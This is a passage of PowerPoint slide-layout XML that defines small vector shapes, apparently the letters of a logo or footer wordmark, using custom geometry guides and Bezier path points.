                    <a:gd name="T37" fmla="*/ 6 h 16"/>
                    <a:gd name="T38" fmla="*/ 8 w 10"/>
                    <a:gd name="T39" fmla="*/ 5 h 16"/>
                    <a:gd name="T40" fmla="*/ 8 w 10"/>
                    <a:gd name="T41" fmla="*/ 4 h 16"/>
                    <a:gd name="T42" fmla="*/ 8 w 10"/>
                    <a:gd name="T43" fmla="*/ 2 h 16"/>
                    <a:gd name="T44" fmla="*/ 7 w 10"/>
                    <a:gd name="T45" fmla="*/ 1 h 16"/>
                    <a:gd name="T46" fmla="*/ 4 w 10"/>
                    <a:gd name="T47" fmla="*/ 1 h 16"/>
                    <a:gd name="T48" fmla="*/ 2 w 10"/>
                    <a:gd name="T49"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16">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="0"/>
                        <a:pt x="3" y="0"/>
                        <a:pt x="3" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="0"/>
                        <a:pt x="6" y="0"/>
                        <a:pt x="7" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="0"/>
                        <a:pt x="9" y="0"/>
                        <a:pt x="9" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="2"/>
                        <a:pt x="10" y="3"/>
                        <a:pt x="10" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="5"/>
                        <a:pt x="10" y="5"/>
                        <a:pt x="9" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="7"/>
                        <a:pt x="8" y="7"/>
                        <a:pt x="8" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="8"/>
                        <a:pt x="6" y="8"/>
                        <a:pt x="5" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="16"/>
                        <a:pt x="10" y="16"/>
                        <a:pt x="10" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="16"/>
                        <a:pt x="8" y="16"/>
                        <a:pt x="8" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="8"/>
                        <a:pt x="3" y="8"/>
                        <a:pt x="3" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="8"/>
                        <a:pt x="2" y="8"/>
                        <a:pt x="2" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="16"/>
                        <a:pt x="2" y="16"/>
                        <a:pt x="2" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="16"/>
                        <a:pt x="0" y="16"/>
                        <a:pt x="0" y="16"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="2" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="7"/>
                        <a:pt x="2" y="7"/>
                        <a:pt x="2" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="7"/>
                        <a:pt x="4" y="7"/>
                        <a:pt x="4" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="7"/>
                        <a:pt x="6" y="7"/>
                        <a:pt x="7" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="6"/>
                        <a:pt x="8" y="6"/>
                        <a:pt x="8" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="5"/>
                        <a:pt x="8" y="4"/>
                        <a:pt x="8" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="3"/>
                        <a:pt x="8" y="3"/>
                        <a:pt x="8" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="2"/>
                        <a:pt x="7" y="2"/>
                        <a:pt x="7" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="1"/>
                        <a:pt x="6" y="1"/>
                        <a:pt x="4" y="1"/>
                      </a:cubicBez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260"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9490075" y="4559301"/>
                  <a:ext cx="28575" cy="38100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 18"/>
                    <a:gd name="T1" fmla="*/ 0 h 24"/>
                    <a:gd name="T2" fmla="*/ 3 w 18"/>
                    <a:gd name="T3" fmla="*/ 0 h 24"/>
                    <a:gd name="T4" fmla="*/ 9 w 18"/>
                    <a:gd name="T5" fmla="*/ 9 h 24"/>
                    <a:gd name="T6" fmla="*/ 15 w 18"/>
                    <a:gd name="T7" fmla="*/ 0 h 24"/>
                    <a:gd name="T8" fmla="*/ 18 w 18"/>
                    <a:gd name="T9" fmla="*/ 0 h 24"/>
                    <a:gd name="T10" fmla="*/ 10 w 18"/>
                    <a:gd name="T11" fmla="*/ 12 h 24"/>
                    <a:gd name="T12" fmla="*/ 10 w 18"/>
                    <a:gd name="T13" fmla="*/ 24 h 24"/>
                    <a:gd name="T14" fmla="*/ 8 w 18"/>
                    <a:gd name="T15" fmla="*/ 24 h 24"/>
                    <a:gd name="T16" fmla="*/ 8 w 18"/>
                    <a:gd name="T17" fmla="*/ 12 h 24"/>
                    <a:gd name="T18" fmla="*/ 0 w 18"/>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4">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="3" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9" y="9"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="15" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="18" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="10" y="12"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="10" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8" y="1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261"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9525000" y="4567238"/>
                  <a:ext cx="4763" cy="30163"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1 w 2"/>
                    <a:gd name="T1" fmla="*/ 0 h 13"/>
                    <a:gd name="T2" fmla="*/ 2 w 2"/>
                    <a:gd name="T3" fmla="*/ 1 h 13"/>
                    <a:gd name="T4" fmla="*/ 2 w 2"/>
                    <a:gd name="T5" fmla="*/ 2 h 13"/>
                    <a:gd name="T6" fmla="*/ 2 w 2"/>
                    <a:gd name="T7" fmla="*/ 3 h 13"/>
                    <a:gd name="T8" fmla="*/ 1 w 2"/>
                    <a:gd name="T9" fmla="*/ 3 h 13"/>
                    <a:gd name="T10" fmla="*/ 0 w 2"/>
                    <a:gd name="T11" fmla="*/ 3 h 13"/>
                    <a:gd name="T12" fmla="*/ 0 w 2"/>
                    <a:gd name="T13" fmla="*/ 2 h 13"/>
                    <a:gd name="T14" fmla="*/ 0 w 2"/>
                    <a:gd name="T15" fmla="*/ 1 h 13"/>
                    <a:gd name="T16" fmla="*/ 1 w 2"/>
                    <a:gd name="T17" fmla="*/ 0 h 13"/>
                    <a:gd name="T18" fmla="*/ 1 w 2"/>
                    <a:gd name="T19" fmla="*/ 10 h 13"/>
                    <a:gd name="T20" fmla="*/ 2 w 2"/>
                    <a:gd name="T21" fmla="*/ 11 h 13"/>
                    <a:gd name="T22" fmla="*/ 2 w 2"/>
                    <a:gd name="T23" fmla="*/ 12 h 13"/>
                    <a:gd name="T24" fmla="*/ 2 w 2"/>
                    <a:gd name="T25" fmla="*/ 13 h 13"/>
                    <a:gd name="T26" fmla="*/ 1 w 2"/>
                    <a:gd name="T27" fmla="*/ 13 h 13"/>
                    <a:gd name="T28" fmla="*/ 0 w 2"/>
                    <a:gd name="T29" fmla="*/ 13 h 13"/>
                    <a:gd name="T30" fmla="*/ 0 w 2"/>
                    <a:gd name="T31" fmla="*/ 12 h 13"/>
                    <a:gd name="T32" fmla="*/ 0 w 2"/>
                    <a:gd name="T33" fmla="*/ 11 h 13"/>
                    <a:gd name="T34" fmla="*/ 1 w 2"/>
                    <a:gd name="T3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13">
                      <a:moveTo>
                        <a:pt x="1" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="0"/>
                        <a:pt x="2" y="1"/>
                        <a:pt x="2" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="1"/>
                        <a:pt x="2" y="1"/>
                        <a:pt x="2" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="2"/>
                        <a:pt x="2" y="2"/>
                        <a:pt x="2" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="3"/>
                        <a:pt x="1" y="3"/>
                        <a:pt x="1" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="3"/>
                        <a:pt x="0" y="3"/>
                        <a:pt x="0" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="2"/>
                        <a:pt x="0" y="2"/>
                        <a:pt x="0" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="1"/>
                        <a:pt x="0" y="1"/>
                        <a:pt x="0" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="1"/>
                        <a:pt x="1" y="0"/>
                        <a:pt x="1" y="0"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="1" y="10"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="10"/>
                        <a:pt x="2" y="10"/>
                        <a:pt x="2" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="11"/>
                        <a:pt x="2" y="11"/>
                        <a:pt x="2" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="12"/>
                        <a:pt x="2" y="12"/>
                        <a:pt x="2" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="13"/>
                        <a:pt x="1" y="13"/>
                        <a:pt x="1" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="13"/>
                        <a:pt x="0" y="13"/>
                        <a:pt x="0" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="12"/>
                        <a:pt x="0" y="12"/>
                        <a:pt x="0" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="11"/>
                        <a:pt x="0" y="11"/>
                        <a:pt x="0" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="10"/>
                        <a:pt x="1" y="10"/>
                        <a:pt x="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262"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9550400" y="4559301"/>
                  <a:ext cx="41275" cy="38100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 26"/>
                    <a:gd name="T1" fmla="*/ 24 h 24"/>
                    <a:gd name="T2" fmla="*/ 4 w 26"/>
                    <a:gd name="T3" fmla="*/ 0 h 24"/>
                    <a:gd name="T4" fmla="*/ 4 w 26"/>
                    <a:gd name="T5" fmla="*/ 0 h 24"/>
                    <a:gd name="T6" fmla="*/ 13 w 26"/>
                    <a:gd name="T7" fmla="*/ 19 h 24"/>
                    <a:gd name="T8" fmla="*/ 23 w 26"/>
                    <a:gd name="T9" fmla="*/ 0 h 24"/>
                    <a:gd name="T10" fmla="*/ 23 w 26"/>
                    <a:gd name="T11" fmla="*/ 0 h 24"/>
                    <a:gd name="T12" fmla="*/ 26 w 26"/>
                    <a:gd name="T13" fmla="*/ 24 h 24"/>
                    <a:gd name="T14" fmla="*/ 25 w 26"/>
                    <a:gd name="T15" fmla="*/ 24 h 24"/>
                    <a:gd name="T16" fmla="*/ 22 w 26"/>
                    <a:gd name="T17" fmla="*/ 6 h 24"/>
                    <a:gd name="T18" fmla="*/ 15 w 26"/>
                    <a:gd name="T19" fmla="*/ 24 h 24"/>
                    <a:gd name="T20" fmla="*/ 13 w 26"/>
                    <a:gd name="T21" fmla="*/ 24 h 24"/>
                    <a:gd name="T22" fmla="*/ 4 w 26"/>
                    <a:gd name="T23" fmla="*/ 6 h 24"/>
                    <a:gd name="T24" fmla="*/ 3 w 26"/>
                    <a:gd name="T25" fmla="*/ 24 h 24"/>
                    <a:gd name="T26" fmla="*/ 0 w 26"/>
                    <a:gd name="T2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4">
                      <a:moveTo>
                        <a:pt x="0" y="24"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="19"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="23" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="23" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="26" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="25" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="22" y="6"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="15" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4" y="6"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="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Rectangle 263"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9599613" y="4559301"/>
                  <a:ext cx="4763"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64"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9607550" y="4557713"/>
                  <a:ext cx="22225" cy="39688"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 9"/>
                    <a:gd name="T1" fmla="*/ 14 h 17"/>
                    <a:gd name="T2" fmla="*/ 1 w 9"/>
                    <a:gd name="T3" fmla="*/ 13 h 17"/>
                    <a:gd name="T4" fmla="*/ 5 w 9"/>
                    <a:gd name="T5" fmla="*/ 15 h 17"/>
                    <a:gd name="T6" fmla="*/ 6 w 9"/>
                    <a:gd name="T7" fmla="*/ 15 h 17"/>
                    <a:gd name="T8" fmla="*/ 7 w 9"/>
                    <a:gd name="T9" fmla="*/ 14 h 17"/>
                    <a:gd name="T10" fmla="*/ 8 w 9"/>
                    <a:gd name="T11" fmla="*/ 13 h 17"/>
                    <a:gd name="T12" fmla="*/ 7 w 9"/>
                    <a:gd name="T13" fmla="*/ 11 h 17"/>
                    <a:gd name="T14" fmla="*/ 4 w 9"/>
                    <a:gd name="T15" fmla="*/ 9 h 17"/>
                    <a:gd name="T16" fmla="*/ 2 w 9"/>
                    <a:gd name="T17" fmla="*/ 6 h 17"/>
                    <a:gd name="T18" fmla="*/ 1 w 9"/>
                    <a:gd name="T19" fmla="*/ 4 h 17"/>
                    <a:gd name="T20" fmla="*/ 1 w 9"/>
                    <a:gd name="T21" fmla="*/ 2 h 17"/>
                    <a:gd name="T22" fmla="*/ 3 w 9"/>
                    <a:gd name="T23" fmla="*/ 1 h 17"/>
                    <a:gd name="T24" fmla="*/ 5 w 9"/>
                    <a:gd name="T25" fmla="*/ 0 h 17"/>
                    <a:gd name="T26" fmla="*/ 7 w 9"/>
                    <a:gd name="T27" fmla="*/ 1 h 17"/>
                    <a:gd name="T28" fmla="*/ 9 w 9"/>
                    <a:gd name="T29" fmla="*/ 3 h 17"/>
                    <a:gd name="T30" fmla="*/ 8 w 9"/>
                    <a:gd name="T31" fmla="*/ 4 h 17"/>
                    <a:gd name="T32" fmla="*/ 6 w 9"/>
                    <a:gd name="T33" fmla="*/ 2 h 17"/>
                    <a:gd name="T34" fmla="*/ 5 w 9"/>
                    <a:gd name="T35" fmla="*/ 2 h 17"/>
                    <a:gd name="T36" fmla="*/ 3 w 9"/>
                    <a:gd name="T37" fmla="*/ 2 h 17"/>
                    <a:gd name="T38" fmla="*/ 3 w 9"/>
                    <a:gd name="T39" fmla="*/ 4 h 17"/>
                    <a:gd name="T40" fmla="*/ 3 w 9"/>
                    <a:gd name="T41" fmla="*/ 5 h 17"/>
                    <a:gd name="T42" fmla="*/ 4 w 9"/>
                    <a:gd name="T43" fmla="*/ 6 h 17"/>
                    <a:gd name="T44" fmla="*/ 6 w 9"/>
                    <a:gd name="T45" fmla="*/ 8 h 17"/>
                    <a:gd name="T46" fmla="*/ 9 w 9"/>
                    <a:gd name="T47" fmla="*/ 10 h 17"/>
                    <a:gd name="T48" fmla="*/ 9 w 9"/>
                    <a:gd name="T49" fmla="*/ 13 h 17"/>
                    <a:gd name="T50" fmla="*/ 8 w 9"/>
                    <a:gd name="T51" fmla="*/ 16 h 17"/>
                    <a:gd name="T52" fmla="*/ 5 w 9"/>
                    <a:gd name="T53" fmla="*/ 17 h 17"/>
                    <a:gd name="T54" fmla="*/ 2 w 9"/>
                    <a:gd name="T55" fmla="*/ 16 h 17"/>
                    <a:gd name="T56" fmla="*/ 0 w 9"/>
                    <a:gd name="T57"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 h="17">
                      <a:moveTo>
                        <a:pt x="0" y="14"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="13"/>
                        <a:pt x="1" y="13"/>
                        <a:pt x="1" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="15"/>
                        <a:pt x="3" y="15"/>
                        <a:pt x="5" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="15"/>
                        <a:pt x="6" y="15"/>
                        <a:pt x="6" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="15"/>
                        <a:pt x="7" y="14"/>
                        <a:pt x="7" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="14"/>
                        <a:pt x="8" y="13"/>
                        <a:pt x="8" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="12"/>
                        <a:pt x="7" y="12"/>
                        <a:pt x="7" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="10"/>
                        <a:pt x="6" y="10"/>
                        <a:pt x="4" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="8"/>
                        <a:pt x="2" y="7"/>
                        <a:pt x="2" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="6"/>
                        <a:pt x="1" y="5"/>
                        <a:pt x="1" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="3"/>
                        <a:pt x="1" y="3"/>
                        <a:pt x="1" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="1"/>
                        <a:pt x="2" y="1"/>
                        <a:pt x="3" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="0"/>
                        <a:pt x="4" y="0"/>
                        <a:pt x="5" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="0"/>
                        <a:pt x="6" y="0"/>
                        <a:pt x="7" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="1"/>
                        <a:pt x="8" y="2"/>
                        <a:pt x="9" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="4"/>
                        <a:pt x="8" y="4"/>
                        <a:pt x="8" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="3"/>
                        <a:pt x="7" y="2"/>
                        <a:pt x="6" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="2"/>
                        <a:pt x="5" y="2"/>
                        <a:pt x="5" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="2"/>
                        <a:pt x="4" y="2"/>
                        <a:pt x="3" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="3"/>
                        <a:pt x="3" y="3"/>
                        <a:pt x="3" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="4"/>
                        <a:pt x="3" y="5"/>
                        <a:pt x="3" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="5"/>
                        <a:pt x="3" y="6"/>
                        <a:pt x="4" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="6"/>
                        <a:pt x="5" y="7"/>
                        <a:pt x="6" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="9"/>
                        <a:pt x="8" y="9"/>
                        <a:pt x="9" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="11"/>
                        <a:pt x="9" y="12"/>
                        <a:pt x="9" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="14"/>
                        <a:pt x="9" y="15"/>
                        <a:pt x="8" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="17"/>
                        <a:pt x="6" y="17"/>
                        <a:pt x="5" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="17"/>
                        <a:pt x="3" y="17"/>
                        <a:pt x="2" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="16"/>
                        <a:pt x="1" y="15"/>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65"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9632950" y="4557713"/>
                  <a:ext cx="22225" cy="39688"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 9"/>
                    <a:gd name="T1" fmla="*/ 14 h 17"/>
                    <a:gd name="T2" fmla="*/ 1 w 9"/>
                    <a:gd name="T3" fmla="*/ 13 h 17"/>
                    <a:gd name="T4" fmla="*/ 5 w 9"/>
                    <a:gd name="T5" fmla="*/ 15 h 17"/>
                    <a:gd name="T6" fmla="*/ 6 w 9"/>
                    <a:gd name="T7" fmla="*/ 15 h 17"/>
                    <a:gd name="T8" fmla="*/ 7 w 9"/>
                    <a:gd name="T9" fmla="*/ 14 h 17"/>
                    <a:gd name="T10" fmla="*/ 8 w 9"/>
                    <a:gd name="T11" fmla="*/ 13 h 17"/>
                    <a:gd name="T12" fmla="*/ 7 w 9"/>
                    <a:gd name="T13" fmla="*/ 11 h 17"/>
                    <a:gd name="T14" fmla="*/ 4 w 9"/>
                    <a:gd name="T15" fmla="*/ 9 h 17"/>
                    <a:gd name="T16" fmla="*/ 2 w 9"/>
                    <a:gd name="T17" fmla="*/ 6 h 17"/>
                    <a:gd name="T18" fmla="*/ 1 w 9"/>
                    <a:gd name="T19" fmla="*/ 4 h 17"/>
                    <a:gd name="T20" fmla="*/ 2 w 9"/>
                    <a:gd name="T21" fmla="*/ 2 h 17"/>
                    <a:gd name="T22" fmla="*/ 3 w 9"/>
                    <a:gd name="T23" fmla="*/ 1 h 17"/>
                    <a:gd name="T24" fmla="*/ 5 w 9"/>
                    <a:gd name="T25" fmla="*/ 0 h 17"/>
                    <a:gd name="T26" fmla="*/ 7 w 9"/>
                    <a:gd name="T27" fmla="*/ 1 h 17"/>
                    <a:gd name="T28" fmla="*/ 9 w 9"/>
                    <a:gd name="T29" fmla="*/ 3 h 17"/>
                    <a:gd name="T30" fmla="*/ 8 w 9"/>
                    <a:gd name="T31" fmla="*/ 4 h 17"/>
                    <a:gd name="T32" fmla="*/ 6 w 9"/>
                    <a:gd name="T33" fmla="*/ 2 h 17"/>
                    <a:gd name="T34" fmla="*/ 5 w 9"/>
                    <a:gd name="T35" fmla="*/ 2 h 17"/>
                    <a:gd name="T36" fmla="*/ 3 w 9"/>
                    <a:gd name="T37" fmla="*/ 2 h 17"/>
                    <a:gd name="T38" fmla="*/ 3 w 9"/>
                    <a:gd name="T39" fmla="*/ 4 h 17"/>
                    <a:gd name="T40" fmla="*/ 3 w 9"/>
                    <a:gd name="T41" fmla="*/ 5 h 17"/>
                    <a:gd name="T42" fmla="*/ 4 w 9"/>
                    <a:gd name="T43" fmla="*/ 6 h 17"/>
                    <a:gd name="T44" fmla="*/ 6 w 9"/>
                    <a:gd name="T45" fmla="*/ 8 h 17"/>
                    <a:gd name="T46" fmla="*/ 9 w 9"/>
                    <a:gd name="T47" fmla="*/ 10 h 17"/>
                    <a:gd name="T48" fmla="*/ 9 w 9"/>
                    <a:gd name="T49" fmla="*/ 13 h 17"/>
                    <a:gd name="T50" fmla="*/ 8 w 9"/>
                    <a:gd name="T51" fmla="*/ 16 h 17"/>
                    <a:gd name="T52" fmla="*/ 5 w 9"/>
                    <a:gd name="T53" fmla="*/ 17 h 17"/>
                    <a:gd name="T54" fmla="*/ 2 w 9"/>
                    <a:gd name="T55" fmla="*/ 16 h 17"/>
                    <a:gd name="T56" fmla="*/ 0 w 9"/>
                    <a:gd name="T57"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 h="17">
                      <a:moveTo>
                        <a:pt x="0" y="14"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="13"/>
                        <a:pt x="1" y="13"/>
                        <a:pt x="1" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="15"/>
                        <a:pt x="3" y="15"/>
                        <a:pt x="5" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="15"/>
                        <a:pt x="6" y="15"/>
                        <a:pt x="6" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="15"/>
                        <a:pt x="7" y="14"/>
                        <a:pt x="7" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="14"/>
                        <a:pt x="8" y="13"/>
                        <a:pt x="8" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="12"/>
                        <a:pt x="8" y="12"/>
                        <a:pt x="7" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="10"/>
                        <a:pt x="6" y="10"/>
                        <a:pt x="4" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="8"/>
                        <a:pt x="2" y="7"/>
                        <a:pt x="2" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="6"/>
                        <a:pt x="1" y="5"/>
                        <a:pt x="1" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="3"/>
                        <a:pt x="1" y="3"/>
                        <a:pt x="2" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="1"/>
                        <a:pt x="2" y="1"/>
                        <a:pt x="3" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="0"/>
                        <a:pt x="4" y="0"/>
                        <a:pt x="5" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="0"/>
                        <a:pt x="6" y="0"/>
                        <a:pt x="7" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="1"/>
                        <a:pt x="8" y="2"/>
                        <a:pt x="9" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="4"/>
                        <a:pt x="8" y="4"/>
                        <a:pt x="8" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="3"/>
                        <a:pt x="7" y="2"/>
                        <a:pt x="6" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="2"/>
                        <a:pt x="5" y="2"/>
